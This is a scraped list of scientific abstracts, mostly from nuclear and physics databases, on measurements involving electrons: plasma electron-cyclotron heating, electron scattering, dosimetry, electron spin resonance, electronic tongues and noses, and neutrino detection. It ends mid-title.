Igami, H.; Ito, S.; Kobayashi, S.; Mizuno, Y.; Okada, K.; Osakabe, M.; Mutoh, T. [National Institute for Fusion Science, Toki 509-5292 (Japan) 2014-11-15 In order to evaluate the electron cyclotron (EC) heating power inside the Large Helical Device vacuum vessel and to investigate the physics of the interaction between the EC beam and the plasma, a direct measurement system for the EC beam transmitted through the plasma column was developed. The system consists of an EC beam target plate, which is made of isotropic graphite and faces against the EC beam through the plasma, and an IR camera for measuring the target plate temperature increase by the transmitted EC beam. This system is applicable to the high magnetic field (up to 2.75 T) and plasma density (up to 0.8 × 10{sup 19} m{sup −3}). This system successfully evaluated the transmitted EC beam profile and the refraction. 8. Fitting phase shifts to electron-ion elastic scattering measurements International Nuclear Information System (INIS) Per, M.C.; Dickinson, A.S. 2000-01-01 We have derived non-Coulomb phase shifts from measured differential cross sections for electron scattering by the ions Na + , Cs + , N 3+ , Ar 8+ and Xe 6+ at energies below the inelastic threshold. Values of the scaled squared deviation between the observed and fitted differential cross sections, χ 2 , for the best-fit phase shifts were typically in the range 3-6 per degree of freedom. Generally good agreement with experiment is obtained, except for wide-angle scattering by Ar 8+ and Xe 6+ . Current measurements do not define phase shifts to better than approx. 0.1 rad even in the most favourable circumstances and uncertainties can be much larger. (author) 9. Dose measurement of fast electrons with a modified Fricke solution International Nuclear Information System (INIS) Nemec, H.W.; Roth, J.; Luethy, H. 1975-01-01 A combination of two different modifications indicated in the literature about the ferrosulfate dosimetry is given. This permits a dose measurement which shows compared to the usual Fricke dosimetry above all following advantages: dose specification related to water; displacement of the absorption maximum in the perceptible spectral sphere; increase of the sensibility and lower influence of pollutions. The molar coefficient of extinction of the modified solution has been determined from 60 Co gamma irradiation and is epsilonsub(m) = 1.46 x 10 4 l x Mol -1 x cm -1 . The increase of extinction which has been measured with this method after the irradiation with 18 MeV electrons occurs linearly within the studied region to 1,200 rd at least, the G-value is 15.5. The indicated method renders possible a relative simple calibration of the ionization chambers used in the practice. (orig.) [de 10. Electron Spin Resonance Measurement with Microinductor on Chip Directory of Open Access Journals (Sweden) Akio Kitagawa 2011-01-01 Full Text Available The detection of radicals on a chip is demonstrated. The proposed method is based on electron spin resonance (ESR spectroscopy and the measurement of high-frequency impedance of the microinductor fabricated on the chip. The measurement was by using a frequency sweep of approximately 100 MHz. The ESR spectra of di(phenyl-(2,4,6-trinitrophenyliminoazanium (DPPH dropped on the microinductor which is fabricated with CMOS 350-nm technology were observed at room temperature. The volume of the DPPH ethanol solution was 2 μL, and the number of spins on the micro-inductor was estimated at about 1014. The sensitivity is not higher than that of the standard ESR spectrometers. However, the result indicates the feasibility of a near field radical sensor in which the microinductor as a probe head and ESR signal processing circuit are integrated. 11. Assessment of a nanoparticle bridge platform for molecular electronics measurements International Nuclear Information System (INIS) Jafri, S H M; Blom, T; Leifer, K; Stroemme, M; Welch, K; Loefaas, H; Grigoriev, A; Ahuja, R 2010-01-01 A combination of electron beam lithography, photolithography and focused ion beam milling was used to create a nanogap platform, which was bridged by gold nanoparticles in order to make electrical measurements and assess the platform under ambient conditions. Non-functionalized electrodes were tested to determine the intrinsic response of the platform and it was found that creating devices in ambient conditions requires careful cleaning and awareness of the contributions contaminants may make to measurements. The platform was then used to make measurements on octanethiol (OT) and biphenyldithiol (BPDT) molecules by functionalizing the nanoelectrodes with the molecules prior to bridging the nanogap with nanoparticles. Measurements on OT show that it is possible to make measurements on relatively small numbers of molecules, but that a large variation in response can be expected when one of the metal-molecule junctions is physisorbed, which was partially explained by attachment of OT molecules to different sites on the surface of the Au electrode using a density functional theory calculation. On the other hand, when dealing with BPDT, high yields for device creation are very difficult to achieve under ambient conditions. Significant hysteresis in the I-V curves of BPDT was also observed, which was attributed primarily to voltage induced changes at the interface between the molecule and the metal. 12. Measurements of the Secondary Electron Emission of Some Insulators CERN Document Server Bozhko, Y.; Hilleret, N. 2013-01-01 Charging up the surface of an insulator after beam impact can lead either to reverse sign of field between the surface and collector of electrons for case of thick sample or appearance of very high internal field for thin films. Both situations discard correct measurements of secondary electron emission (SEE) and can be avoided via reducing the beam dose. The single pulse method with pulse duration of order of tens microseconds has been used. The beam pulsing was carried out by means of an analog switch introduced in deflection plate circuit which toggles its output between "beam on" and "beam off" voltages depending on level of a digital pulse. The error in measuring the beam current for insulators with high value of SEE was significantly reduced due to the use for this purpose a titanium sample having low value of the SEE with DC method applied. Results obtained for some not coated insulators show considerable increase of the SEE after baking out at 3500C what could be explained by the change of work functi... 13. Biophysical dose measurement using electron paramagnetic resonance in rodent teeth International Nuclear Information System (INIS) Khan, R.F.H.; Rink, W.J.; Boreham, D.R. 2003-01-01 Electron paramagnetic resonance (EPR) dosimetry of human tooth enamel has been widely used in measuring radiation doses in various scenarios. However, there are situations that do not involve a human victim (e.g. tests for suspected environmental overexposures, measurements of doses to experimental animals in radiation biology research, or chronology of archaeological deposits). For such cases we have developed an EPR dosimetry technique making use of enamel of teeth extracted from mice. Tooth enamel from both previously irradiated and unirradiated mice was extracted and cleaned by processing in supersaturated KOH aqueous solution. Teeth from mice with no previous irradiation history exhibited a linear EPR response to the dose in the range from 0.8 to 5.5 Gy. The EPR dose reconstruction for a preliminarily irradiated batch resulted in the radiation dose of (1.4±0.2) Gy, which was in a good agreement with the estimated exposure of the teeth. The sensitivity of the EPR response of mouse enamel to gamma radiation was found to be half of that of human tooth enamel. The dosimetric EPR signal of mouse enamel is stable up at least to 42 days after exposure to radiation. Dose reconstruction was only possible with the enamel extracted from molars and premolars and could not be performed with incisors. Electron micrographs showed structural variations in the incisor enamel, possibly explaining the large interfering signal in the non-molar teeth 14. Measuring up: Implementing a dental quality measure in the electronic health record context. Science.gov (United States) Bhardwaj, Aarti; Ramoni, Rachel; Kalenderian, Elsbeth; Neumann, Ana; Hebballi, Nutan B; White, Joel M; McClellan, Lyle; Walji, Muhammad F 2016-01-01 Quality improvement requires using quality measures that can be implemented in a valid manner. Using guidelines set forth by the Meaningful Use portion of the Health Information Technology for Economic and Clinical Health Act, the authors assessed the feasibility and performance of an automated electronic Meaningful Use dental clinical quality measure to determine the percentage of children who received fluoride varnish. The authors defined how to implement the automated measure queries in a dental electronic health record. Within records identified through automated query, the authors manually reviewed a subsample to assess the performance of the query. The automated query results revealed that 71.0% of patients had fluoride varnish compared with the manual chart review results that indicated 77.6% of patients had fluoride varnish. The automated quality measure performance results indicated 90.5% sensitivity, 90.8% specificity, 96.9% positive predictive value, and 75.2% negative predictive value. The authors' findings support the feasibility of using automated dental quality measure queries in the context of sufficient structured data. Information noted only in free text rather than in structured data would require using natural language processing approaches to effectively query electronic health records. To participate in self-directed quality improvement, dental clinicians must embrace the accountability era. Commitment to quality will require enhanced documentation to support near-term automated calculation of quality measures. Copyright © 2016 American Dental Association. Published by Elsevier Inc. All rights reserved. 15. Methods for measurement of electron emission yield under low energy electron-irradiation by collector method and Kelvin probe method Energy Technology Data Exchange (ETDEWEB) Tondu, Thomas; Belhaj, Mohamed; Inguimbert, Virginie [Onera, DESP, 2 Avenue Edouard Belin, 31400 Toulouse (France); Onera, DESP, 2 Avenue Edouard Belin, 31400 Toulouse, France and Fondation STAE, 4 allee Emile Monso, BP 84234-31432, Toulouse Cedex 4 (France); Onera, DESP, 2 Avenue Edouard Belin, 31400 Toulouse (France) 2010-09-15 Secondary electron emission yield of gold under electron impact at normal incidence below 50 eV was investigated by the classical collector method and by the Kelvin probe method. The authors show that biasing a collector to ensure secondary electron collection while keeping the target grounded can lead to primary electron beam perturbations. Thus reliable secondary electron emission yield at low primary electron energy cannot be obtained with a biased collector. The authors present two collector-free methods based on current measurement and on electron pulse surface potential buildup (Kelvin probe method). These methods are consistent, but at very low energy, measurements become sensitive to the earth magnetic field (below 10 eV). For gold, the authors can extrapolate total emission yield at 0 eV to 0.5, while a total electron emission yield of 1 is obtained at 40{+-}1 eV. 16. Methods for measurement of electron emission yield under low energy electron-irradiation by collector method and Kelvin probe method International Nuclear Information System (INIS) Tondu, Thomas; Belhaj, Mohamed; Inguimbert, Virginie 2010-01-01 Secondary electron emission yield of gold under electron impact at normal incidence below 50 eV was investigated by the classical collector method and by the Kelvin probe method. The authors show that biasing a collector to ensure secondary electron collection while keeping the target grounded can lead to primary electron beam perturbations. Thus reliable secondary electron emission yield at low primary electron energy cannot be obtained with a biased collector. The authors present two collector-free methods based on current measurement and on electron pulse surface potential buildup (Kelvin probe method). These methods are consistent, but at very low energy, measurements become sensitive to the earth magnetic field (below 10 eV). For gold, the authors can extrapolate total emission yield at 0 eV to 0.5, while a total electron emission yield of 1 is obtained at 40±1 eV. 17. Electron bunch length measurement at the Vanderbilt FEL Energy Technology Data Exchange (ETDEWEB) Amirmadhi, F.; Brau, C.A.; Mendenhall, M. [Vanderbilt Free-Electron-Laser Center, Nashville, TN (United States)] [and others 1995-12-31 During the past few years, a number of experiments have been performed to demonstrate the possibility to extract the longitudinal charge distribution from spectroscopic measurements of the coherent far-infrared radiation emitted as transition radiation or synchrotron radiation. Coherent emission occurs in a spectral region where the wavelength is comparable to or longer than the bunch length, leading to an enhancement of the radiation intensity that is on the order of the number of particles per bunch, as compared to incoherent radiation. This technique is particularly useful in the region of mm and sub-mm bunch lengths, a range where streak-cameras cannot be used for beam diagnostics due to their limited time resolution. Here we report on experiments that go beyond the proof of principle of this technique by applying it to the study and optimization of FEL performance. We investigated the longitudinal bunch length of the Vanderbilt FEL by analyzing the spectrum of coherent transition radiation emitted by the electron bunches. By monitoring the bunch length while applying a bunch-compression technique, the amount of the compression could be easily observed. This enabled us to perform a systematic study of the FEL performance, especially gain and optical pulse width, as a function of the longitudinal electron distribution in the bunch. The results of this study will be presented and discussed. 18. Instrumental measurement of beer taste attributes using an electronic tongue International Nuclear Information System (INIS) Rudnitskaya, Alisa; Polshin, Evgeny; Kirsanov, Dmitry; Lammertyn, Jeroen; Nicolai, Bart; Saison, Daan; Delvaux, Freddy R.; Delvaux, Filip; Legin, Andrey 2009-01-01 The present study deals with the evaluation of the electronic tongue multisensor system as an analytical tool for the rapid assessment of taste and flavour of beer. Fifty samples of Belgian and Dutch beers of different types (lager beers, ales, wheat beers, etc.), which were characterized with respect to the sensory properties, were measured using the electronic tongue (ET) based on potentiometric chemical sensors developed in Laboratory of Chemical Sensors of St. Petersburg University. The analysis of the sensory data and the calculation of the compromise average scores was made using STATIS. The beer samples were discriminated using both sensory panel and ET data based on PCA, and both data sets were compared using Canonical Correlation Analysis. The ET data were related to the sensory beer attributes using Partial Least Square regression for each attribute separately. Validation was done based on a test set comprising one-third of all samples. The ET was capable of predicting with good precision 20 sensory attributes of beer including such as bitter, sweet, sour, fruity, caramel, artificial, burnt, intensity and body. 19. Improved measurement of electron antineutrino disappearance at Daya Bay International Nuclear Information System (INIS) An Fengpeng; Bai Jingzhi; An Qi 2013-01-01 We report an improved measurement of the neutrino mixing angle θ13 from the Daya Bay Reactor Neutrino Experiment. We exclude a zero value for sin 2 2θ 13 with a significance of 7.7 standard deviations. Electron antineutrinos from six reactors of 2.9 GW th were detected in six antineutrino detectors deployed in two near (flux-weighted baselines of 470 m and 576 m) and one far (1648 m) underground experimental halls. Using 139 days of data, 28909 (205308) electron antineutrino candidates were detected at the far hall (near halls). The ratio of the observed to the expected number of antineutrinos assuming no oscillations at the far hall is 0.944±0.007(stat.)±0.003(syst.). An analysis of the relative rates in six detectors finds sin 2 2θ 13 =0.089±0.010(stat.)±0.005(syst.) in a three-neutrino framework. (authors) 20. Instrumental measurement of beer taste attributes using an electronic tongue. Science.gov (United States) Rudnitskaya, Alisa; Polshin, Evgeny; Kirsanov, Dmitry; Lammertyn, Jeroen; Nicolai, Bart; Saison, Daan; Delvaux, Freddy R; Delvaux, Filip; Legin, Andrey 2009-07-30 The present study deals with the evaluation of the electronic tongue multisensor system as an analytical tool for the rapid assessment of taste and flavour of beer. Fifty samples of Belgian and Dutch beers of different types (lager beers, ales, wheat beers, etc.), which were characterized with respect to the sensory properties, were measured using the electronic tongue (ET) based on potentiometric chemical sensors developed in Laboratory of Chemical Sensors of St. Petersburg University. The analysis of the sensory data and the calculation of the compromise average scores was made using STATIS. The beer samples were discriminated using both sensory panel and ET data based on PCA, and both data sets were compared using Canonical Correlation Analysis. The ET data were related to the sensory beer attributes using Partial Least Square regression for each attribute separately. Validation was done based on a test set comprising one-third of all samples. The ET was capable of predicting with good precision 20 sensory attributes of beer including such as bitter, sweet, sour, fruity, caramel, artificial, burnt, intensity and body. 1. Instrumental measurement of beer taste attributes using an electronic tongue Energy Technology Data Exchange (ETDEWEB) Rudnitskaya, Alisa, E-mail: [email protected] [Chemistry Department, University of Aveiro, Aveiro (Portugal); Laboratory of Chemical Sensors, Chemistry Department, St. Petersburg University, St. Petersburg (Russian Federation); Polshin, Evgeny [Laboratory of Chemical Sensors, Chemistry Department, St. Petersburg University, St. Petersburg (Russian Federation); BIOSYST/MeBioS, Catholic University of Leuven, W. De Croylaan 42, B-3001 Leuven (Belgium); Kirsanov, Dmitry [Laboratory of Chemical Sensors, Chemistry Department, St. Petersburg University, St. Petersburg (Russian Federation); Lammertyn, Jeroen; Nicolai, Bart [BIOSYST/MeBioS, Catholic University of Leuven, W. De Croylaan 42, B-3001 Leuven (Belgium); Saison, Daan; Delvaux, Freddy R.; Delvaux, Filip [Centre for Malting and Brewing Sciences, Katholieke Universiteit Leuven, Heverelee (Belgium); Legin, Andrey [Laboratory of Chemical Sensors, Chemistry Department, St. Petersburg University, St. Petersburg (Russian Federation) 2009-07-30 The present study deals with the evaluation of the electronic tongue multisensor system as an analytical tool for the rapid assessment of taste and flavour of beer. Fifty samples of Belgian and Dutch beers of different types (lager beers, ales, wheat beers, etc.), which were characterized with respect to the sensory properties, were measured using the electronic tongue (ET) based on potentiometric chemical sensors developed in Laboratory of Chemical Sensors of St. Petersburg University. The analysis of the sensory data and the calculation of the compromise average scores was made using STATIS. The beer samples were discriminated using both sensory panel and ET data based on PCA, and both data sets were compared using Canonical Correlation Analysis. The ET data were related to the sensory beer attributes using Partial Least Square regression for each attribute separately. Validation was done based on a test set comprising one-third of all samples. The ET was capable of predicting with good precision 20 sensory attributes of beer including such as bitter, sweet, sour, fruity, caramel, artificial, burnt, intensity and body. 2. In situ Measurements of Phytoplankton Fluorescence Using Low Cost Electronics Directory of Open Access Journals (Sweden) Dana L. Wright 2013-06-01 Full Text Available Chlorophyll a fluorometry has long been used as a method to study phytoplankton in the ocean. In situ fluorometry is used frequently in oceanography to provide depth-resolved estimates of phytoplankton biomass. However, the high price of commercially manufactured in situ fluorometers has made them unavailable to some individuals and institutions. Presented here is an investigation into building an in situ fluorometer using low cost electronics. The goal was to construct an easily reproducible in situ fluorometer from simple and widely available electronic components. The simplicity and modest cost of the sensor makes it valuable to students and professionals alike. Open source sharing of architecture and software will allow students to reconstruct and customize the sensor on a small budget. Research applications that require numerous in situ fluorometers or expendable fluorometers can also benefit from this study. The sensor costs US$150.00 and can be constructed with little to no previous experience. The sensor uses a blue LED to excite chlorophyll a and measures fluorescence using a silicon photodiode. The sensor is controlled by an Arduino microcontroller that also serves as a data logger. 3. Electron temperature measurements of FRX-C/LSM International Nuclear Information System (INIS) Rej, D.J. 1989-01-01 The electron temperature T/sub e/ has been measured with Thomson scattering field-reversed configurations (FRCs) on the Los Alamos FRX-C/LSM experiment. FRCs formed and trapped in-situ in the θ-pinch source are studied. These experiments mark the first comprehensive FRC T/sub e/ measurements in over five years with data gathered on over 400 discharges. Measurements are performed at a single point in space and time on each discharge. The Thomson scattering diagnostic consist of a Q-switched ruby laser focused from one end to a point 0.2 m from the axial midplane of the θ-pinch coil and at radius of either 0.00 or 0.10 m. Scattered light is collected, dispersed and detected with a 7-channel, triple-grating polychromator configured to detect light wavelengths between 658 and 692 nm. Photomultiplier currents are measured with gated A/D converters, with plasma background signals recorded 100-ns before and 100-ns after the laser pulse. Electron temperatures are measured at either radial position during the time interval, 10 ≤ t ≤ 70 μs, between FRC formation and the onset of the n = 2 instability which usually terminates the discharge. A variety of plasma conditions have been produced by adjusting three external parameters: the initial deuterium fill pressure p/sub O/; the reversed bias magnetic field B/sub b/; and the external magnetic field B/sub w/. The fill-pressure scan has been performed at B/sub b/ ≅ 60 mT and B/sub w/ ≅ 0.4 T with p/sub o/ set at either 2, 3, 4 or 5 mtorr. The bias-field scan, 37 ≤ B/sub b/ ≤ 95 mT, has been performed at p/sub o/ = 3 mtorr and B/sub w/ ≅ 0.4 T. 7 refs., 3 figs., 3 tabs 4. Molecular bonding in SF6 measured by elastic electron scattering International Nuclear Information System (INIS) Miller, J.D.; Fink, M. 1992-01-01 Elastic differential cross-section measurements of gaseous SF 6 were made with 30 keV electrons in the range of 0.25 bohrs -1 ≤s≤10 bohrs -1 . Structural parameters derived in this study closely matched those found in an earlier total (elastic plus inelastic) scattering investigation. Multiple-scattering effects were incorporated in the structural refinement. The discrepancies between the independent atom model and the measured differential cross section reproduce earlier total scattering results for momentum transfers of greater than 5 bohrs -1 . By extending the measurements to smaller s values, a closer examination of a Hartree--Fock calculation for SF 6 was possible. It was found that the difference curve obtained from the Hartree--Fock calculation matched the experimental data in this region. A more quantitative analysis was performed using the analytic expressions of Bonham and Fink to compute moments of the molecular charge distribution from the differential cross-section data. Comparison of these results with similar fits to the Hartree--Fock calculation confirmed the good agreement between the Hartree--Fock calculation and the current elastic data 5. Electronic Nose For Measuring Wine Evolution In Wine Cellars International Nuclear Information System (INIS) Lozano, J.; Santos, J. P.; Horrillo, M. C.; Cabellos, J. M.; Arroyo, T. 2009-01-01 An electronic nose installed in a wine cellar for measuring the wine evolution is presented in this paper. The system extract the aroma directly from the tanks where wine is stored and carry the volatile compounds to the sensors cell. A tin oxide multisensor, prepared with RF sputtering onto an alumina substrate and doped with chromium and indium, is used. The whole system is fully automated and controlled by computer and can be supervised by internet. Linear techniques like principal component analysis (PCA) and nonlinear ones like probabilistic neural networks (PNN) are used for pattern recognition. Results show that system can detect the evolution of two different wines along 9 months stored in tanks. This system could be trained to detect off-odours of wine and warn the wine expert to correct it as soon as possible, improving the final quality of wine. 6. Electron and current density measurements on tokamak plasmas International Nuclear Information System (INIS) Lammeren, A.C.A.P. van. 1991-01-01 The first part of this thesis describes the Thomson-scattering diagnostic as it was present at the TORTUR tokamak. For the first time with this diagnostic a complete tangential scattering spectrum was recorded during one single laser pulse. From this scattering spectrum the local current density was derived. Small deviations from the expected gaussian scattering spectrum were observed indicating the non-Maxwellian character of the electron-velocity distribution. The second part of this thesis describes the multi-channel interferometer/ polarimeter diagnostic which was constructed, build and operated on the Rijnhuizen Tokamak Project (RTP) tokamak. The diagnostic was operated routinely, yielding the development of the density profiles for every discharge. When ECRH (Electron Cyclotron Resonance Heating) is switched on the density profile broadens, the central density decreases and the total density increases, the opposite takes place when ECRH is switched off. The influence of MHD (magnetohydrodynamics) activity on the density was clearly observable. In the central region of the plasma it was measured that in hydrogen discharges the so-called sawtooth collapse is preceded by an m=1 instability which grows rapidly. An increase in radius of this m=1 mode of 1.5 cm just before the crash is observed. In hydrogen discharges the sawtooth induced density pulse shows an asymmetry for the high- and low-field side propagation. This asymmetry disappeared for helium discharges. From the location of the maximum density variations during an m=2 mode the position of the q=2 surface is derived. The density profiles are measured during the energy quench phase of a plasma disruption. A fast flattening and broadening of the density profile is observed. (author). 95 refs.; 66 figs.; 7 tabs 7. Suppression of suprathermal ions from a colloidal microjet target containing SnO2 nanoparticles by using double laser pulses International Nuclear Information System (INIS) Higashiguchi, Takeshi; Kaku, Masanori; Katto, Masahito; Kubodera, Shoichi 2007-01-01 We have demonstrated suppression of suprathermal ions from a colloidal microjet target plasma containing tin-dioxide (SnO 2 ) nanoparticles irradiated by double laser pulses. We observed a significant decrease of the tin and oxygen ion signals in the charged-state-separated energy spectra when double laser pulses were irradiated. The peak energy of the singly ionized tin ions decreased from 9 to 3 keV when a preplasma was produced. The decrease in the ion energy, considered as debris suppression, is attributed to the interaction between an expanding low-density preplasma and a main laser pulse 8. Suppression of suprathermal ions from a colloidal microjet target containing SnO2 nanoparticles by using double laser pulses Science.gov (United States) Higashiguchi, Takeshi; Kaku, Masanori; Katto, Masahito; Kubodera, Shoichi 2007-10-01 We have demonstrated suppression of suprathermal ions from a colloidal microjet target plasma containing tin-dioxide (SnO2) nanoparticles irradiated by double laser pulses. We observed a significant decrease of the tin and oxygen ion signals in the charged-state-separated energy spectra when double laser pulses were irradiated. The peak energy of the singly ionized tin ions decreased from 9to3keV when a preplasma was produced. The decrease in the ion energy, considered as debris suppression, is attributed to the interaction between an expanding low-density preplasma and a main laser pulse. 9. Measuring penetration depth of electron beam welds. Final report International Nuclear Information System (INIS) Hill, J.W.; Collins, M.C.; Mentesana, C.P.; Watterson, C.E. 1975-07-01 The feasibility of evaluating electron beam welds using state-of-the-art techniques in the fields of holographic interferometry, micro-resistance measurements, and heat transfer was studied. The holographic study was aimed at evaluating weld defects by monitoring variations in weld strength under mechanical stress. The study, along with successful work at another facility, proved the feasibility of this approach for evaluating welds, but it did not assign any limitations to the technique. The micro-resistance study was aimed at evaluating weld defects by measuring the electrical resistance across the weld junction as a function of distance along the circumference. Experimentation showed this method, although sensitive, is limited by the same factors affecting other conventional nondestructive tests. Nevertheless, it was successful at distinguishing between various depths of penetration. It was also shown to be a sensitive thickness gage for thin-walled parts. The infrared study was aimed at evaluating weld defects by monitoring heat transfer through the weld under transient thermal conditions. Experimentation showed that this theoretically sound technique is not workable with the infrared equipment currently available at Bendix Kansas City. (U.S.) 10. Electron Beam Polarization Measurement Using Touschek Lifetime Technique Energy Technology Data Exchange (ETDEWEB) Sun, Changchun; /Duke U., DFELL; Li, Jingyi; /Duke U., DFELL; Mikhailov, Stepan; /Duke U., DFELL; Popov, Victor; /Duke U., DFELL; Wu, Wenzhong; /Duke U., DFELL; Wu, Ying; /Duke U., DFELL; Chao, Alex; /SLAC; Xu, Hong-liang; /Hefei, NSRL; Zhang, Jian-feng; /Hefei, NSRL 2012-08-24 Electron beam loss due to intra-beam scattering, the Touschek effect, in a storage ring depends on the electron beam polarization. The polarization of an electron beam can be determined from the difference in the Touschek lifetime compared with an unpolarized beam. In this paper, we report on a systematic experimental procedure recently developed at Duke FEL laboratory to study the radiative polarization of a stored electron beam. Using this technique, we have successfully observed the radiative polarization build-up of an electron beam in the Duke storage ring, and determined the equilibrium degree of polarization and the time constant of the polarization build-up process. 11. Measurement of electron beam bunch phase length by rectangular cavities International Nuclear Information System (INIS) Afanas'ev, V.D.; Rudychev, V.G.; Ushakov, V.I. 1976-01-01 An analysis of a phase length of electron bunches with the help of crossed rectangular resonators with the Hsub(102) oscillation type has been made. It has been shown that the electron coordinates after the duplex resonator are described by an ellipse equation for a non-modulated beam. An influence of the initial energy spread upon the electron motion has been studied. It has been ascertained that energy modulation of the electron beam results in displacement of each electron with respect to the ellipse which is proportional to modulation energy, i.e. an error in determination of the phase length of an electron bunch is proportional to the beam energy spread. Relations have been obtained which enable to find genuine values of phases of the analyzed electrons with an accuracy up to linear multipliers 12. Alpha and conversion electron spectroscopy of 238,239Pu and 241Am and alpha-conversion electron coincidence measurements Energy Technology Data Exchange (ETDEWEB) Dion, Michael P.; Miller, Brian W.; Warren, Glen A. 2016-09-01 A technique to determine the isotopics of a mixed actinide sample has been proposed by measuring the coincidence of the alpha particle during radioactive decay with the conversion electron (or Auger) emitted during the relaxation of the daughter isotope. This presents a unique signature to allow the deconvolution of isotopes that possess overlapping alpha particle energy. The work presented here are results of conversion electron spectroscopy of 241Am, 238Pu and 239Pu using a dual-stage peltier-cooled 25 mm2 silicon drift detector. A passivated ion implanted planar silicon detector provided measurements of alpha spectroscopy. The conversion electron spectra were evaluated from 20–55 keV based on fits to the dominant conversion electron emissions, which allowed the relative conversion electron emission intensities to be determined. These measurements provide crucial singles spectral information to aid in the coincident measurement approach. 13. The Lunar Potential Determination Using Apollo-Era Data and Modern Measurements and Models Science.gov (United States) Collier, Michael R.; Farrell, William M.; Espley, Jared; Webb, Phillip; Stubbs, Timothy J.; Webb, Phillip; Hills, H. Kent; Delory, Greg 2008-01-01 Since the Apollo era the electric potential of the Moon has been a subject of interest and debate. Deployed by three Apollo missions, Apollo 12, Apollo 14 and Apollo 15, the Suprathermal Ion Detector Experiment (SIDE) determined the sunlit lunar surface potential to be about +10 Volts using the energy spectra of lunar ionospheric thermal ions accelerated toward the Moon. More recently, the Lunar Prospector (LP) Electron Reflectometer used electron distributions to infer negative lunar surface potentials, primarily in shadow. We will present initial results from a study to combine lunar surface potential measurements from both SIDE and the LP/Electron Reflectometer to calibrate an advanced model of lunar surface charging which includes effects from the plasma environment, photoemission, secondaries ejected by ion impact onto the lunar surface, and the lunar wake created downstream by the solar wind-lunar interaction. 14. Characterization of LH induced current carrying fast electrons in JET Energy Technology Data Exchange (ETDEWEB) Ramponi, G.; Airoldi, A. [Consiglio Nazionale delle Ricerche, Milan (Italy). Lab. di Fisica del Plasma; Bartlett, D.; Brusati, M.; Froissard, P.; Gormezano, C.; Rimini, F.; Silva, R.P. da; Tanzi, C.P. [Commission of the European Communities, Abingdon (United Kingdom). JET Joint Undertaking 1992-12-31 Lower Hybrid Current Drive (LHCD) experiments have recently been made at JET by coupling up to 2.4 MW of RF power at 3.7 GHz, with a power spectrum centered at n{sub ||} = 1.8 {+-} 0.2 corresponding to a resonating electron energy of about 100 keV via Electron Landau Damping. The Current Drive (CD) efficiency has been observed to increase when LH and ICRH power are applied simultaneously to the plasma, suggesting that a part of the fast magnetosonic wave is absorbed on the LH-generated fast electrons. An important problem of CD experiments in tokamaks is the determination of the radial distribution of the driven current and the characterization in the momentum space of the current carrying fast electrons by using appropriate diagnostic tools. For this purpose, a combined analysis of the Electron Cyclotron Emission (ECE) and of the Fast Electron Bremsstrahlung (FEB) measurements has been made, allowing the relevant parameters of the suprathermal electrons to be estimated. (author) 5 refs., 5 figs., 2 tabs. 15. Characterization of LH induced current carrying fast electrons in JET International Nuclear Information System (INIS) Ramponi, G.; Airoldi, A.; Bartlett, D.; Brusati, M.; Froissard, P.; Gormezano, C.; Rimini, F.; Silva, R.P. da; Tanzi, C.P. 1992-01-01 Lower Hybrid Current Drive (LHCD) experiments have recently been made at JET by coupling up to 2.4 MW of RF power at 3.7 GHz, with a power spectrum centered at n || = 1.8 ± 0.2 corresponding to a resonating electron energy of about 100 keV via Electron Landau Damping. The Current Drive (CD) efficiency has been observed to increase when LH and ICRH power are applied simultaneously to the plasma, suggesting that a part of the fast magnetosonic wave is absorbed on the LH-generated fast electrons. An important problem of CD experiments in tokamaks is the determination of the radial distribution of the driven current and the characterization in the momentum space of the current carrying fast electrons by using appropriate diagnostic tools. For this purpose, a combined analysis of the Electron Cyclotron Emission (ECE) and of the Fast Electron Bremsstrahlung (FEB) measurements has been made, allowing the relevant parameters of the suprathermal electrons to be estimated. (author) 5 refs., 5 figs., 2 tabs 16. Lifetime measurements in transitional nuclei by fast electronic scintillation timing Science.gov (United States) Caprio, M. A.; Zamfir, N. V.; Casten, R. F.; Amro, H.; Barton, C. J.; Beausang, C. W.; Cooper, J. R.; Gürdal, G.; Hecht, A. A.; Hutter, C.; Krücken, R.; McCutchan, E. A.; Meyer, D. A.; Novak, J. R.; Pietralla, N.; Ressler, J. J.; Berant, Z.; Brenner, D. S.; Gill, R. L.; Regan, P. H. 2002-10-01 A new generation of experiments studying nuclei in spherical-deformed transition regions has been motivated by the introduction of innovative theoretical approaches to the treatment of these nuclei. The important structural signatures in the transition regions, beyond the basic yrast level properties, involve γ-ray transitions between low-spin, non-yrast levels, and so information on γ-ray branching ratios and absolute matrix elements (or level lifetimes) for these transitions is crucial. A fast electronic scintillation timing (FEST) system [H. Mach, R. L. Gill, and M. Moszyński, Nucl. Instrum. Methods A 280, 49 (1989)], making use of BaF2 and plastic scintillation detectors, has been implemented at the Yale Moving Tape Collector for the measurement of lifetimes of states populated in β^ decay. Experiments in the A100 (Pd, Ru) and A150 (Dy, Yb) regions have been carried out, and a few examples will be presented. Supported by the US DOE under grants and contracts DE-FG02-91ER-40609, DE-FG02-88ER-40417, and DE-AC02-98CH10886 and by the German DFG under grant Pi 393/1. 17. Measuring Nursing Value from the Electronic Health Record. Science.gov (United States) Welton, John M; Harper, Ellen M 2016-01-01 We report the findings of a big data nursing value expert group made up of 14 members of the nursing informatics, leadership, academic and research communities within the United States tasked with 1. Defining nursing value, 2. Developing a common data model and metrics for nursing care value, and 3. Developing nursing business intelligence tools using the nursing value data set. This work is a component of the Big Data and Nursing Knowledge Development conference series sponsored by the University Of Minnesota School Of Nursing. The panel met by conference calls for fourteen 1.5 hour sessions for a total of 21 total hours of interaction from August 2014 through May 2015. Primary deliverables from the bit data expert group were: development and publication of definitions and metrics for nursing value; construction of a common data model to extract key data from electronic health records; and measures of nursing costs and finance to provide a basis for developing nursing business intelligence and analysis systems. 18. High-Resolution Measurements of Low-Energy Conversion Electrons CERN Multimedia Gizon, A; Putaux, J 2002-01-01 Measurements of low-energy internal conversion electrons have been performed with high energy resolution in some N = 105 odd and odd-odd nuclei using a semi-circular spectrograph associated to a specific tape transport system. These experiments aimed to answer the following questions~: \\begin{itemize} \\item Do M3 isomeric transitions exist in $^{183}$Pt and $^{181}$Os, isotones of $^{184}$Au~? \\item Are the neutron configurations proposed to describe the isomeric and ground states of $^{184}$Au right or wrong~? \\item Does it exist an isomeric state in $^{182}$Ir, isotone of $^{181}$Os, $^{183}$Pt and $^{184}$Au~? \\item What are the spin and parity values of the excited states of $^{182}$Ir~? \\end{itemize} In $^{183}$Pt, the 35.0 keV M3 isomeric transition has been clearly observed and the reduced transition probability has been determined. The deduced hindrance factor is close to that observed in the neighbouring odd-odd $^{184}$Au nucleus. This confirms the neutron configurations previously proposed for the ... 19. submitter Measurement of LYSO Intrinsic Light Yield Using Electron 